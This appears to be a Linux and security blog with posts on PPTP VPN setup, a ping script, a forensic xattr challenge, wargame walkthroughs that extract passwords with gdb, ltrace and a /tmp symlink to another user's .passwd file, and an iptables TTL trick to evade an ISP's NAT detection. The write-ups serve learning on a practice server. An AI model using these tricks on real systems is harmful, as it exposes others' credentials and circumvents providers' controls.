Linux

PPTP VPN With Debian (add button disabled)

Today I had to set up a PPTP VPN on a Debian virtual machine, so I installed the following packages:

  • $ sudo apt-get install pptpd
  • $ sudo apt-get install pptp
  • $ sudo apt-get install network-manager-pptp

but when I tried to add the VPN (System -> Preferences -> Network Connections) the « Add » button was disabled.

I tried the installed command-line tools such as « pptpsetup », but I still couldn't connect to my VPN remotely. After a few searches with apt-cache search, and with the help of a friend, we found out that other packages were missing. To solve the problem you have to install the following package:

  • $ sudo apt-get install network-manager-pptp-gnome (the GNOME GUI plugin for NetworkManager)

If this doesn't solve the problem yet (and to install everything), I finally installed these as well:

  • $ sudo apt-get install network-manager-openvpn
  • $ sudo apt-get install network-manager-vpnc
  • $ sudo apt-get install network-manager-vpnc-gnome

After this I restarted the following services:

  • /etc/init.d/pptpd restart
  • /etc/init.d/network-manager restart

and I could configure my VPN.

And that's it. One caveat: PPTP's MS-CHAPv2 authentication and the MPPE keys derived from it have known practical breaks, so treat a PPTP tunnel as a compatibility option, not as a confidential one.

NAT is blocked

Today I got a new laptop at home and wanted to connect it to the internet, but my ISP required me to
register the MAC address of every device I wanted to connect: for 10£ I could register
4 MAC addresses!

Unfortunately for me, I have well over 10 devices to connect.
That's why I decided to buy a Cisco Linksys E2000 router and use NAT (Network Address Translation).
Once my router was set up and connected, I discovered with horror that I couldn't get on the internet, and always
received a message like the following: « NAT was detected … bla bla bla Illegal … bla bla bla ».

As you may imagine, a basic connection looks like the following:

[Diagram: Network]

but in my case, it could be drawn like the following:

[Diagram: ISP]

and I wanted to add a router implementing NAT so I would not have to buy more « MAC addresses ».


After some reading (the NAT RFCs) and a few tests with Wireshark, I found that the only field the router modified was the TTL (Time To Live) of the IP header: every router decrements it by one, so the ISP sees my packets arrive with a TTL one lower than a directly connected machine would produce, and that is what gives the NAT away.

That's how I came up with the idea of increasing the TTL on my machines, and I quickly discovered that a single iptables command does it (mangle table, on each machine behind the router):

iptables -t mangle -I POSTROUTING -j TTL --ttl-inc 2

(the TTL target takes --ttl-inc <n>, --ttl-dec <n> or --ttl-set <value>, and the chain name must be written POSTROUTING in upper case) and this is how I bypassed the TTL check of my ISP.

Have fun ;)

Next step: a Linux router that increments the TTL by 1 on the router itself!
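A model of the check described above, added here as an example (it is not from the original post): it infers the number of routers a packet has crossed from its TTL, the way an ISP's NAT detector does, and shows what a host-side --ttl-inc rule does to that inference. The detector assumes the ISP compares against the usual OS defaults (64, 128, 255); the exact rule the author's ISP used is not known, and the sample values are constructed.

```python
"""TTL-based NAT detection as an ISP might do it, and the effect of
compensating for it with an iptables TTL --ttl-inc rule on the host.
Added example; constructed values, not captures from the post."""

# Initial TTLs set by common operating systems: Linux/macOS 64, Windows 128,
# many network devices 255.  Assumption of this model, not a fact from the post.
INITIAL_TTLS = (64, 128, 255)


def infer_hops(ttl):
    """Return (assumed_initial_ttl, hops) for an observed TTL.

    The assumed initial value is the smallest common default that is >= ttl;
    the difference is the number of routers the packet has crossed.
    """
    if not 0 <= ttl <= 255:
        raise ValueError("TTL must fit in one byte")
    for initial in INITIAL_TTLS:
        if ttl <= initial:
            return initial, initial - ttl
    raise AssertionError("unreachable: 255 is always >= ttl")


def nat_detected(observed_ttls):
    """A directly connected host reaches the ISP with hops == 0; any packet
    that has crossed one or more routers betrays a NAT device in between."""
    return any(infer_hops(ttl)[1] > 0 for ttl in observed_ttls)


def ttl_inc(ttl, n):
    """Model of `iptables -t mangle -I POSTROUTING -j TTL --ttl-inc n` on the
    sending host (the field is one byte, so it saturates at 255)."""
    return min(255, ttl + n)


def router_hop(ttl):
    """Model of an IP router forwarding the packet: TTL is decremented by one."""
    if ttl <= 1:
        raise ValueError("TTL expired in transit")
    return ttl - 1


def simulate(host_initial_ttl, inc, hops_behind_nat=1):
    """TTL the ISP sees for a packet from a host `hops_behind_nat` routers
    away, with a --ttl-inc rule of `inc` on the host (0 = no rule)."""
    ttl = ttl_inc(host_initial_ttl, inc)
    for _ in range(hops_behind_nat):
        ttl = router_hop(ttl)
    return ttl


if __name__ == "__main__":
    # Constructed sample: a Linux laptop on the ISP modem vs. behind the router.
    print("direct :", infer_hops(64), "NAT?", nat_detected([64]))
    print("behind :", infer_hops(63), "NAT?", nat_detected([63]))
    print("inc 1  :", simulate(64, 1), "NAT?", nat_detected([simulate(64, 1)]))
    print("inc 2  :", simulate(64, 2), "NAT?", nat_detected([simulate(64, 2)]))
```

Under this strict model the hop count has to come out at exactly 0: incrementing by 1 on a host one router away gives a clean 64, while incrementing by 2 yields 65, which this detector would also flag. The author's ISP evidently accepted the +2, so its check was laxer than the one modelled here.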

Ping Script

A few minutes ago I finished this little ping script,
for non-initiated users.

It first pings 192.168.1.1,
then pings 192.168.2.1,
after that it pings 8.8.8.8,
and finally pings www.google.com.

Why does it ping 1.1 and 2.1?

Because my friend wanted to use it in different places (he is not familiar with the shell), for example 1.1 at work and 2.1 at home.

Why does it ping 8.8.8.8 and google.com?

Same idea: 8.8.8.8 is Google's public DNS, and google.com checks that the web is reachable (name resolution plus connectivity).

How does it work?

Run script.sh: it sends 5 pings to 1.1 and prints the result in GREEN / RED, then 5 pings to 2.1 and prints the result in GREEN / RED,
and so on.

The script :

#!/bin/bash
# /bin/sh (dash on Debian) does not understand "echo -e", so use bash and printf
GREEN="\033[1;32m"
NORMAL="\033[0;39m"
RED="\033[1;31m"

# check <host> <label> : 5 pings, then one GREEN/RED summary line
check() {
	if ping -c 5 "$1"; then
		printf "%b ping %s passed %b\n" "$GREEN" "$2" "$NORMAL"
	else
		printf "%b ping %s failed %b\n" "$RED" "$2" "$NORMAL"
	fi
}

clear
####################### 1.1 ################
check 192.168.1.1 1.1
########################## 2.1 ##############
check 192.168.2.1 2.1
########################## 8.8 ##############
check 8.8.8.8 8.8
########################## GOOGLE ##############
check www.google.com google

So have fun ;)

Hidden password in an extended attribute

Today I was playing with some forensic challenges and one of them surprised me.
It went like this: « A password is hidden … but where? »

The file was an image, and my first idea was to try some steganography tools,
but after a good hour and some research I was getting bored, and
asked my friend Google about hidden data on OS X.

After a few minutes I found the answer: xattr,
the EXTENDED ATTRIBUTES. They are somewhat similar to alternate
data streams on Windows: extra named blobs attached to a file that neither ls -l
nor a hex dump of the file's content will show you.

That's why I decided to explain how it works:

Open a shell, start Python and import the xattr module:

>>> import xattr
>>> xattr.listxattr("test.png")
(u'com.apple.metadata:kMDItemWhereFroms', u'user.comment')
>>>

As you can see there are some attributes, and one of them is « user.comment ». After
some research on the internet (1 min) I found out how to print it:

>>> xattr.getxattr("test.png", "user.comment")
'Password: XnHjst6&'
>>>

And the challenge was done! It was the first time I had seen extended attributes, and I found them very interesting. On OS X you can also spot them from the shell: ls -l@ shows a file's attributes and their sizes, and xattr -l test.png prints them with their values.

have fun
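A small triage tool for the same situation, added here as an example and not code from the original post: it walks a directory tree and lists every extended attribute on every file, so a user.comment like the one above cannot be overlooked. It uses only the Python standard library (os.listxattr/os.getxattr, available on Linux; the post's session used the third-party xattr module on OS X, whose API differs), and the sample files and the attribute value it plants are constructed.

```python
"""Walk a directory tree and report every extended attribute, so that data
tucked away in user.* attributes (like the challenge's user.comment) is not
missed during triage.  Added example using only the standard library on Linux;
the original post used the third-party `xattr` module on OS X."""
import os
import tempfile


def file_xattrs(path):
    """Return {attribute_name: raw_bytes} for one file, without following
    symlinks (a planted link must not make us read another file's data)."""
    result = {}
    if not hasattr(os, "listxattr"):       # not Linux: the os module lacks xattr calls
        return result
    try:
        names = os.listxattr(path, follow_symlinks=False)
    except OSError:
        return result                      # no xattr support on this fs, or no access
    for name in names:
        try:
            result[name] = os.getxattr(path, name, follow_symlinks=False)
        except OSError:
            pass                           # vanished, or not readable (e.g. security.*)
    return result


def scan_tree(root):
    """Return {relative_path: {name: value}} for every file under root that
    carries at least one extended attribute."""
    found = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            full = os.path.join(dirpath, fname)
            attrs = file_xattrs(full)
            if attrs:
                found[os.path.relpath(full, root)] = attrs
    return found


def render(value):
    """Show attribute values the way a reader wants them: text if it decodes as
    UTF-8, hex otherwise (Apple's kMDItem* attributes are binary plists)."""
    try:
        return value.decode("utf-8")
    except UnicodeDecodeError:
        return value.hex()


def demo():
    """Constructed sample: one plain file and one carrying a user.comment.
    Returns None when the filesystem (or OS) refuses user.* attributes."""
    root = tempfile.mkdtemp(prefix="xattr-demo-")
    plain = os.path.join(root, "plain.png")
    hidden = os.path.join(root, "test.png")
    for path in (plain, hidden):
        with open(path, "wb") as fh:
            fh.write(b"\x89PNG\r\n\x1a\n")  # fake PNG header; content is irrelevant
    try:
        os.setxattr(hidden, "user.comment", b"Password: not-the-real-one")
    except (OSError, AttributeError):
        return None
    return scan_tree(root)


if __name__ == "__main__":
    for path, attrs in (demo() or {}).items():
        for name, value in attrs.items():
            print(f"{path}: {name} = {render(value)}")
```

Keep xattrs in mind when imaging evidence as well: cp needs --preserve=xattr, GNU tar needs --xattrs and rsync needs -X, otherwise the hidden data is silently dropped in the copy.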

Intruded Nº4

For the 4th one, we remember that there was a program called
« level4 » in the /wargame folder, so let's go to it.

First run:

level4@leviathan:/wargame$ ./level4
Enter the password> lol
bzzzzzzzzap. WRONG
level4@leviathan:/wargame$

Interesting … it looks like the second challenge, so let's disassemble the main function:

(gdb) disassemble main
Dump of assembler code for function main:
0x08048523 :	lea    0x4(%esp),%ecx
0x08048527 :	and    $0xfffffff0,%esp
0x0804852a :	pushl  0xfffffffc(%ecx)
0x0804852d :	push   %ebp
0x0804852e :	mov    %esp,%ebp
0x08048530 :	push   %ecx
0x08048531 :	sub    $0x44,%esp
0x08048534 :	mov    0x8048757,%eax
0x08048539 :	mov    %eax,0xfffffff1(%ebp)
0x0804853c :	movzwl 0x804875b,%eax
0x08048543 :	mov    %ax,0xfffffff5(%ebp)
0x08048547 :	movzbl 0x804875d,%eax
0x0804854e :	mov    %al,0xfffffff7(%ebp)
0x08048551 :	mov    0x804875e,%eax
0x08048556 :	mov    %eax,0xffffffe7(%ebp)
0x08048559 :	mov    0x8048762,%eax
0x0804855e :	mov    %eax,0xffffffeb(%ebp)
0x08048561 :	movzwl 0x8048766,%eax
0x08048568 :	mov    %ax,0xffffffef(%ebp)
0x0804856c :	mov    0x8048768,%eax
0x08048571 :	mov    %eax,0xffffffe0(%ebp)
0x08048574 :	movzwl 0x804876c,%eax
0x0804857b :	mov    %ax,0xffffffe4(%ebp)
0x0804857f :	movzbl 0x804876e,%eax
0x08048586 :	mov    %al,0xffffffe6(%ebp)
0x08048589 :	mov    0x804876f,%eax
0x0804858e :	mov    %eax,0xffffffd9(%ebp)
0x08048591 :	movzwl 0x8048773,%eax
0x08048598 :	mov    %ax,0xffffffdd(%ebp)
0x0804859c :	movzbl 0x8048775,%eax
0x080485a3 :	mov    %al,0xffffffdf(%ebp)
0x080485a6 :	mov    0x8048776,%eax
0x080485ab :	mov    %eax,0xffffffcf(%ebp)
0x080485ae :	mov    0x804877a,%eax
0x080485b3 :	mov    %eax,0xffffffd3(%ebp)
0x080485b6 :	movzwl 0x804877e,%eax
0x080485bd :	mov    %ax,0xffffffd7(%ebp)
0x080485c1 :	lea    0xffffffd9(%ebp),%eax
0x080485c4 :	mov    %eax,0x4(%esp)
0x080485c8 :	lea    0xffffffe0(%ebp),%eax
0x080485cb :	mov    %eax,(%esp)
0x080485ce :	call   0x804835c <strcmp@plt>
0x080485d3 :	test   %eax,%eax
0x080485d5 :	jne    0x80485de 
0x080485d7 :	movl   $0x1,0xfffffff8(%ebp)
0x080485de :	movl   $0x8048742,(%esp)
0x080485e5 :	call   0x80483bc

0x080485ea :	call   0x8048484 
0x080485ef :	add    $0x44,%esp
0x080485f2 :	pop    %ecx
0x080485f3 :	pop    %ebp
0x080485f4 :	lea    0xfffffffc(%ecx),%esp
0x080485f7 :	ret
---Type <return> to continue, or q <return> to quit---q
Quit

Again, we can pick out the interesting part:

0x080485ce :	call   0x804835c <strcmp@plt>
0x080485d3 :	test   %eax,%eax
0x080485d5 :	jne    0x80485de 

Let's put a breakpoint on strcmp and run until it asks for the password:

(gdb) b *0x804835c
Breakpoint 1 at 0x804835c
(gdb) r
Starting program: /wargame/level4 

Breakpoint 1, 0x0804835c in strcmp@plt ()
(gdb) s
Single stepping until exit from function strcmp@plt,
which has no line number information.
0xb7f1eec0 in strcmp () from /lib/tls/i686/cmov/libc.so.6
(gdb) s
Single stepping until exit from function strcmp,
which has no line number information.
0x080485d3 in main ()
(gdb) s
Single stepping until exit from function main,
which has no line number information.
Enter the password> test

/!\ There is an interesting thing: I had to press « s » 3 times to arrive at my breakpoint
(I should analyse this, anyway let's continue) /!\

Let's see what's happening when we look at $esp:

(gdb) x/2x $esp
0xbffff8bc:	0x080484e6	0xbffff8dd
(gdb) x/s 0xbffff8dd
0xbffff8dd:	 "test\n"

OK, we got our password back, so let's go a bit further:

(gdb) x/3x $esp
0xbffff8bc: 0x080484e6 0xbffff8dd 0xbffff9dd
(gdb) x/s 0xbffff9dd
0xbffff9dd:	 "snlprintf\n"
(gdb)

OK … here there is a little trick: "snlprintf" is the password we are looking for,
they just used a C-looking function name as the string. The clue is the "\n" at the end of snlprintf ;)

Let's try the password:

level4@leviathan:/wargame$ ./level4
Enter the password> snlprintf
[You've got shell]!
sh-3.1$

Yeah, let's go to the next level ;)

Intruded Nº3

Hi,

ready for challenge number 3?

Let's connect to it:


ssh level3@leviathan.intruded.net -p 10101
*************************************************
*    Welcome to Intruded.net Wargame Server     *
*                                               *
*       * You are playing "Leviathan"           *
*       * Most levels can be found in /wargame  *
*       * Login: level1:leviathan               *
*       * Support: irc.intruded.net #wargames   *
*                                               *
*                                               *
*       ! Server is restarted every 12 hours    *
*       ! Server is cleaned every reboot        *
*       ! /tmp direcotry is writable            *
*                                               *
*                                               *
*************************************************
level3@leviathan.intruded.net's password:
Linux leviathan 2.6.18-6-686 #1 SMP Thu Aug 20 21:56:59 UTC 2009 i686

level3@leviathan:~$

Let's go directly to the wargame folder:

level3@leviathan:~$ cd /wargame/
level3@leviathan:/wargame$ ls
check  level4  printfile  prog  sphinx

Let's try the programs one by one, to see which one is ours:

level3@leviathan:/wargame$ ls
check  level4  printfile  prog  sphinx
level3@leviathan:/wargame$ ./level4
-bash: ./level4: Permission denied
level3@leviathan:/wargame$ ./printfile
-bash: ./printfile: Permission denied
level3@leviathan:/wargame$ ./sphinx
-bash: ./sphinx: Permission denied
level3@leviathan:/wargame$ ./prog
Cannot find /tmp/file.log
level3@leviathan:/wargame$

It looks like we have to use ./prog.

We have to read /home/level4/.passwd, and ./prog reads the file /tmp/file.log and prints its content.
/tmp is world-writable and ./prog runs with level4's rights (it can read what we cannot), so let's link the two:

level3@leviathan:/wargame$ ln -s /home/level4/.passwd /tmp/file.log
level3@leviathan:/wargame$ ./prog
R0gBtSP5
level3@leviathan:/wargame$

Yeah … got it!!

OK, next challenges tomorrow :)
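The bug behind level3 is worth spelling out, so here is an added example (not the wargame's own code): a reader that opens a fixed name in a world-writable directory the way ./prog does, beside a hardened version, both run against a constructed copy of the layout (a home/.passwd secret and a tmp/file.log symlink) built in a temporary directory. The file names and the secret's content are made up.

```python
"""The level3 trick: a privileged program opens a fixed name in a world-writable
directory, and open(2) happily follows the symlink the attacker planted there.
Added example, not the wargame's code: the naive reader beside a hardened one,
exercised against a constructed directory tree in a temp dir."""
import errno
import os
import stat
import tempfile


def naive_read(path):
    """What ./prog does: open() follows symlinks, so /tmp/file.log -> .passwd
    hands back the target's bytes with the program's (level4's) privileges."""
    with open(path, "rb") as fh:
        return fh.read()


def hardened_read(path, expected_uid=None):
    """Refuse symlinks and anything that is not a plain file, and check the
    file that was *actually opened* (fstat on the descriptor) rather than
    stat()ing the path first, which would leave a race between check and open."""
    try:
        fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW | os.O_NOCTTY)
    except OSError as exc:
        if exc.errno == errno.ELOOP:      # O_NOFOLLOW hit a symlink as last component
            raise PermissionError(f"{path}: refusing to follow symlink") from exc
        raise
    try:
        st = os.fstat(fd)
        if not stat.S_ISREG(st.st_mode):
            raise PermissionError(f"{path}: not a regular file")
        if st.st_nlink > 1:
            raise PermissionError(f"{path}: hard link, refusing")
        if expected_uid is not None and st.st_uid != expected_uid:
            raise PermissionError(f"{path}: owned by uid {st.st_uid}, expected {expected_uid}")
    except Exception:
        os.close(fd)
        raise
    with os.fdopen(fd, "rb") as fh:       # takes ownership of fd and closes it
        return fh.read()


def build_scenario():
    """Constructed layout mirroring the wargame: home/.passwd (the secret) and a
    world-writable tmp/ where the attacker drops file.log -> home/.passwd.
    Returns (secret_path, link_path)."""
    root = tempfile.mkdtemp(prefix="level3-")
    home = os.path.join(root, "home")
    tmp = os.path.join(root, "tmp")
    os.mkdir(home)
    os.mkdir(tmp)
    secret = os.path.join(home, ".passwd")
    with open(secret, "wb") as fh:
        fh.write(b"not-the-real-password\n")
    link = os.path.join(tmp, "file.log")
    os.symlink(secret, link)
    return secret, link


def hardened_refuses(path):
    """True if hardened_read rejects path (symlink, non-regular file, wrong owner)."""
    try:
        hardened_read(path, expected_uid=os.getuid())
    except PermissionError:
        return True
    return False


if __name__ == "__main__":
    secret, link = build_scenario()
    print("naive ./prog leaks          :", naive_read(link))
    print("hardened reader refuses link:", hardened_refuses(link))
    print("hardened reader on real file:", hardened_read(secret, os.getuid()))
```

O_NOFOLLOW only protects the last path component; a symlinked directory earlier in the path is still followed, which is why the owner check on the opened file is there too. The real fix for a setuid program is not to trust a fixed name under /tmp at all: use a private directory, or open the directory first and resolve the file relative to it (the dir_fd argument of os.open).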

Intruded nº2

Now that we have passed the first level, let's go for the second one.

Once connected to the second level you get this:

ssh level2@leviathan.intruded.net -p 10101
*************************************************
*    Welcome to Intruded.net Wargame Server     *
*                                               *
*       * You are playing "Leviathan"           *
*       * Most levels can be found in /wargame  *
*       * Login: level1:leviathan               *
*       * Support: irc.intruded.net #wargames   *
*                                               *
*                                               *
*       ! Server is restarted every 12 hours    *
*       ! Server is cleaned every reboot        *
*       ! /tmp direcotry is writable            *
*                                               *
*                                               *
*************************************************
level2@leviathan.intruded.net's password:
Permission denied, please try again.
level2@leviathan.intruded.net's password:
Linux leviathan 2.6.18-6-686 #1 SMP Thu Aug 20 21:56:59 UTC 2009 i686
level2@leviathan:~$

Let's see what files are available:

level2@leviathan:~$ ls -a
.  ..  .bash_history  .bash_logout  .bash_profile  .bashrc  .passwd
level2@leviathan:~$

Hmm, nothing interesting; let's go one folder up,

level2@leviathan:/home$ ls -a
.  ..  level1  level2  level3  level4  level5  level6  level7  level8
level2@leviathan:/home$ cd level3/
-bash: cd: level3/: Permission denied
level2@leviathan:/home$

Hmm, we cannot get into level3 … let's go one folder up again

level2@leviathan:/$ ls -a
.    boot   etc     initrd.img  media  proc  srv  usr      wargame
..   cdrom  home    lib         mnt    root  sys  var
bin  dev    initrd  lost+found  opt    sbin  tmp  vmlinuz
level2@leviathan:/$

Haaa, there is a wargame folder, let's try this one

level2@leviathan:/wargame$ ls
check  level4  printfile  prog  sphinx
level2@leviathan:/wargame$

OK, let's try the first program:

level2@leviathan:/wargame$ ./check
password: test
Wrong password, Good Bye ...
level2@leviathan:/wargame$

Hmmm, it looks like a strcmp in C … if you remember, I wrote an article about that,
how to get a password with GDB (here).

Let's try it here:

level2@leviathan:/wargame$ gdb ./check
GNU gdb 6.4.90-debian
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".

Let’s disassemble the main function :

(gdb) disassemble main
Dump of assembler code for function main:
0x08048464 :	lea    0x4(%esp),%ecx
0x08048468 :	and    $0xfffffff0,%esp
0x0804846b :	pushl  0xfffffffc(%ecx)
0x0804846e :	push   %ebp
0x0804846f :	mov    %esp,%ebp
0x08048471 :	push   %ecx
0x08048472 :	sub    $0x34,%esp
0x08048475 :	mov    0x8048668,%eax
0x0804847a :	mov    %eax,0xfffffff3(%ebp)
0x0804847d :	mov    0x804866c,%eax
0x08048482 :	mov    %eax,0xffffffec(%ebp)
0x08048485 :	movzwl 0x8048670,%eax
0x0804848c :	mov    %ax,0xfffffff0(%ebp)
0x08048490 :	movzbl 0x8048672,%eax
0x08048497 :	mov    %al,0xfffffff2(%ebp)
0x0804849a :	mov    0x8048673,%eax
0x0804849f :	mov    %eax,0xffffffe8(%ebp)
0x080484a2 :	mov    0x8048677,%eax
0x080484a7 :	mov    %eax,0xffffffe3(%ebp)
0x080484aa :	movzbl 0x804867b,%eax
0x080484b1 :	mov    %al,0xffffffe7(%ebp)
0x080484b4 :	movl   $0x8048638,(%esp)
0x080484bb :	call   0x8048398

0x080484c0 :	call   0x8048338 <getchar@plt>
0x080484c5 :	mov    %al,0xfffffff7(%ebp)
0x080484c8 :	call   0x8048338 <getchar@plt>
0x080484cd :	mov    %al,0xfffffff8(%ebp)
0x080484d0 :	call   0x8048338 <getchar@plt>
0x080484d5 :	mov    %al,0xfffffff9(%ebp)
0x080484d8 :	movb   $0x0,0xfffffffa(%ebp)
0x080484dc :	lea    0xfffffff3(%ebp),%eax
0x080484df :	mov    %eax,0x4(%esp)
0x080484e3 :	lea    0xfffffff7(%ebp),%eax
0x080484e6 :	mov    %eax,(%esp)
0x080484e9 :	call   0x8048348 <strcmp@plt>
0x080484ee :	test   %eax,%eax
0x080484f0 :	jne    0x804850c
0x080484f2 :	movl   $0x3ea,(%esp)
0x080484f9 :	call   0x8048358
0x080484fe :	movl   $0x8048643,(%esp)
0x08048505 :	call   0x8048368
0x0804850a :	jmp    0x8048518
0x0804850c :	movl   $0x804864b,(%esp)
0x08048513 :	call   0x8048378

0x08048518 :	add    $0x34,%esp
0x0804851b :	pop    %ecx
0x0804851c :	pop    %ebp
0x0804851d :	lea    0xfffffffc(%ecx),%esp
0x08048520 :	ret
0x08048521 :	nop
0x08048522 :	nop
0x08048523 :	nop
0x08048524 :	nop
0x08048525 :	nop
0x08048526 :	nop
0x08048527 :	nop
0x08048528 :	nop
0x08048529 :	nop
0x0804852a :	nop
0x0804852b :	nop
0x0804852c :	nop
0x0804852d :	nop
0x0804852e :	nop
0x0804852f :	nop
End of assembler dump.

As we can see:

0x080484e9 :	call   0x8048348 <strcmp@plt>
0x080484ee :	test   %eax,%eax
0x080484f0 :	jne    0x804850c

this is the interesting part (three getchar() calls fill a 3-byte buffer, which is then handed to strcmp). Let's put a breakpoint on the call and look at the stack with x/x:

(gdb) b * 0x8048348
Breakpoint 1 at 0x8048348
(gdb) r
Starting program: /wargame/check
password: test

Breakpoint 1, 0x08048348 in strcmp@plt ()
(gdb) x/x $esp
0xbffff9fc:	0x080484ee

As we can see, this gives us what is on top of the stack at that moment: 0x080484ee is the return address into main (the instruction right after the call). Let's look at what it points to with x/s and see what happens.

(gdb) x/s 0x080484ee
0x80484ee :	 "\205?u\032?\004$?\003"

That is not a string but main's code, so let's look at the next stack slots, which hold the two arguments of strcmp:

(gdb) x/2x $esp
0xbffff9fc:	0x080484ee	0xbffffa2f
(gdb) x/s 0xbffffa2f
0xbffffa2f:	 "tes"

Haaa, this is OUR « tes » (only 3 characters were read, so the password is only 3 chars long), let's dig into it
again

(gdb) x/3x $esp
0xbffff9fc:	0x080484ee	0xbffffa2f	0xbffffa2b
(gdb) x/s 0xbffffa2b
0xbffffa2b:	 "sex"
(gdb)

Got it …

Let's run it again, tadaaa, new shell:

level2@leviathan:/wargame$ ./check
password: sex
sh-3.1$

Another solution would have been to use ltrace, which prints every library call with its arguments, so strcmp shows both strings directly:

level2@leviathan:/wargame$ ltrace ./check
__libc_start_main(0x8048464, 1, 0xbffffad4, 0x8048580, 0x8048530
printf("password: ")                                                                                                         = 10
getchar(0x8048638, 0xb7fe0ff4, 0xbffffa28, 0x80483f0, 0xb7fe0ff4password: test
)                                                            = 116
getchar(0x8048638, 0xb7fe0ff4, 0xbffffa28, 0x80483f0, 0xb7fe0ff4)                                                            = 101
getchar(0x8048638, 0xb7fe0ff4, 0xbffffa28, 0x80483f0, 0xb7fe0ff4)                                                            = 115
strcmp("tes", "sex")                                                                                                         = 1
puts("Wrong password, Good Bye ..."Wrong password, Good Bye ...
)                                                                                         = 29
+++ exited (status 29) +++
level2@leviathan:/wargame$

let’s go to the next level ;)

sh-3.1$ cat /home/level3/.passwd
oc7vaCOg
sh-3.1$
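Both this level and level4 come down to reading strcmp's two arguments, and the ltrace route above hands them over in one line. The following added example (not code from the original post) parses ltrace output and pulls out every string-compare call, coping with the two things that make ltrace logs awkward to grep: program output interleaved in the middle of a record (the « password: test » above) and C escapes inside the quoted strings. SAMPLE_LEVEL2 is constructed after the session above; SAMPLE_LEVEL4 is a constructed record shaped like what the level4 check would produce, not an actual trace from the post.

```python
"""Pull the arguments of strcmp/strncmp/memcmp calls out of an ltrace log.
Added example; the sample logs below are constructed."""
import re

COMPARE_FUNCS = {"strcmp", "strncmp", "strcasecmp", "strncasecmp", "memcmp"}

# A complete record once broken lines are joined:  name(args) = return
RECORD_RE = re.compile(
    r'^(?P<func>[A-Za-z_]\w*)\((?P<args>.*)\)\s*=\s*(?P<ret>-?\w+|<void>)\s*$', re.S)
NEW_RECORD_RE = re.compile(r'[A-Za-z_]\w*\(')          # a line starting a new call
STRING_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"(\.\.\.)?')   # "..." plus ltrace's truncation mark

_SIMPLE_ESCAPES = {'n': '\n', 't': '\t', 'r': '\r', 'a': '\a', 'b': '\b',
                   'f': '\f', 'v': '\v', '\\': '\\', '"': '"', "'": "'"}


def unescape_c(literal):
    """Decode C-style escapes as ltrace prints them: \\n, \\t, \\", \\ooo, \\xhh."""
    out, i, n = [], 0, len(literal)
    while i < n:
        ch = literal[i]
        if ch != '\\' or i + 1 >= n:
            out.append(ch)
            i += 1
            continue
        nxt = literal[i + 1]
        if nxt in '01234567':                            # up to three octal digits
            j = i + 1
            while j < n and j < i + 4 and literal[j] in '01234567':
                j += 1
            out.append(chr(int(literal[i + 1:j], 8)))
            i = j
        elif nxt == 'x':                                  # two hex digits
            out.append(chr(int(literal[i + 2:i + 4], 16)))
            i += 4
        else:
            out.append(_SIMPLE_ESCAPES.get(nxt, nxt))
            i += 2
    return ''.join(out)


def split_args(argstr):
    """Split an argument list on commas that are not inside "..."."""
    args, cur, in_str, esc = [], [], False, False
    for ch in argstr:
        if in_str:
            cur.append(ch)
            if esc:
                esc = False
            elif ch == '\\':
                esc = True
            elif ch == '"':
                in_str = False
        elif ch == '"':
            in_str = True
            cur.append(ch)
        elif ch == ',':
            args.append(''.join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    if cur or args:
        args.append(''.join(cur).strip())
    return args


def parse_ltrace(text):
    """Return [(func, [raw args], ret)].  Program output that the traced
    process writes mid-record breaks a line; lines are joined until the closing
    `) = value` appears.  A record left unfinished (e.g. __libc_start_main) is
    dropped as soon as the next call starts."""
    records, pending = [], ''
    for line in text.splitlines():
        line = line.rstrip()
        if not line.strip() or line.startswith(('+++', '---')):
            continue                                      # exit/signal lines
        if pending and NEW_RECORD_RE.match(line):
            pending = ''                                  # previous record never completed
        pending = line if not pending else pending + '\n' + line
        m = RECORD_RE.match(pending)
        if m:
            records.append((m['func'], split_args(m['args']), m['ret']))
            pending = ''
    return records


def decode_arg(raw):
    """Decode one quoted argument, or None if it is not a string.  ltrace appends
    ... after the closing quote when it truncated the string (see its -s option)."""
    m = STRING_RE.match(raw)
    if not m:
        return None
    text = unescape_c(m.group(1))
    return text + '[truncated]' if m.group(2) else text


def extract_compares(text):
    """[(func, [decoded string arguments])] for every string/memory compare;
    in a password check this yields our input and the secret side by side."""
    out = []
    for func, args, _ret in parse_ltrace(text):
        if func in COMPARE_FUNCS:
            strings = [decode_arg(a) for a in args]
            out.append((func, [s for s in strings if s is not None]))
    return out


# Constructed after the level2 session in the post (spacing shortened).
SAMPLE_LEVEL2 = '''__libc_start_main(0x8048464, 1, 0xbffffad4, 0x8048580, 0x8048530 <unfinished ...>
printf("password: ")                                  = 10
getchar(0x8048638, 0xb7fe0ff4, 0xbffffa28, 0x80483f0, 0xb7fe0ff4password: test
)                                                     = 116
getchar(0x8048638, 0xb7fe0ff4, 0xbffffa28, 0x80483f0, 0xb7fe0ff4) = 101
getchar(0x8048638, 0xb7fe0ff4, 0xbffffa28, 0x80483f0, 0xb7fe0ff4) = 115
strcmp("tes", "sex")                                  = 1
puts("Wrong password, Good Bye ..."Wrong password, Good Bye ...
)                                                     = 29
+++ exited (status 29) +++
'''
# Constructed: the shape of the level4 compare (not a trace taken from the post).
SAMPLE_LEVEL4 = 'strcmp("test\\n", "snlprintf\\n")                 = -1\n+++ exited (status 0) +++\n'

if __name__ == "__main__":
    for func, strings in extract_compares(SAMPLE_LEVEL2) + extract_compares(SAMPLE_LEVEL4):
        print(func, [repr(s) for s in strings])
```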

Intruded nº1

Today I tried the Intruded Leviathan wargame (the first levels),

I will explain how to solve them easily.

Let's try the first one.

  1. open a terminal
  2. type « ssh level1@leviathan.intruded.net -p 10101 »
  3. type the password leviathan

and then you should get something like this:

*************************************************
*    Welcome to Intruded.net Wargame Server     *
*                                               *
*       * You are playing "Leviathan"           *
*       * Most levels can be found in /wargame  *
*       * Login: level1:leviathan               *
*       * Support: irc.intruded.net #wargames   *
*                                               *
*                                               *
*       ! Server is restarted every 12 hours    *
*       ! Server is cleaned every reboot        *
*       ! /tmp direcotry is writable            *
*                                               *
*                                               *
*************************************************
level1@leviathan.intruded.net's password:
